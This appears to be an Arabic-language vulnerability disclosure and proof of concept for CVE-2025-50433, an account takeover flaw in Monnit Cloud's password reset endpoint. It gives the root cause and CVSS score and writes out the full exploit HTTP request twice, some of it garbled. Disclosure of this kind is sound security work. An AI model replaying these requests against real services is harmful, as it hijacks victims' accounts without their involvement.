
إثبات مفهوم لاختراق حساب Monnit Cloud الحرج (CVE-2025-50433)، يستغل غياب التحقق من الرمز مقابل البريد الإلكتروني في إعادة تعيين كلمة المرور، ويوفّر خطوات الهجوم والسبب الجذري والإصلاح.
توجد ثغرة خطيرة في المصادقة عبر *.imonnit.com تسمح بـ الاستيلاء الكامل على الحساب (ATO) على أي حساب مستخدم دون تفاعل الضحية.
يفشل الجزء الخلفي في التحقق من الارتباط بين رمز إعادة تعيين كلمة المرور والبريد الإلكتروني المستهدف، مما يمكن المهاجمين من استخدام رمز إعادة التعيين الصالح الخاص بهم لإعادة تعيين كلمة مرور أي حساب ضحية.
[email protected]).[email protected]). POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
Host: www.imonnit.com
Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
__RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
Host: www.imonnit.com
Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
__RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
CVSS 3.1: 9.8 (حرجة)
المتجه: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
*.imonnit.com
لا يقوم نقطة نهاية إعادة تعيين كلمة المرور بالتحقق من أن رمز إعادة التعيين ينتمي إلى نفس البريد الإلكتروني المقدم أثناء عملية إعادة التعيين، مما يتيح إعادة تعيين كلمة المرور بشكل عشوائي باستخدام رموز يتحكم فيها المهاجم.
/Account/PasswordReset/
البائع: Monnit Corporation
Mohamed Mandor (0xmandor) GitHub: https://github.com/0xmandor